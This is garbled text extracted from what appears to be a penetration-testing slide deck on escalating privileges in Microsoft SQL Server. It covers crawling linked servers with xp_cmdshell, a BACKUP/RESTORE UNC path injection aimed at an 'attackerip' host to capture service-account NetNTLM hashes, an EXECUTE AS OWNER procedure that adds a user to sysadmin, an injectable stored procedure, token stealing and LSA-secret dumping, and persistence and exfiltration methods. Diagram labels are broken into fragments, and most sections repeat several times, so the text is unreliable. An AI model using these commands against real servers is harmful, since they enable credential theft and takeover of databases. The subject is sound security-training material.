SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
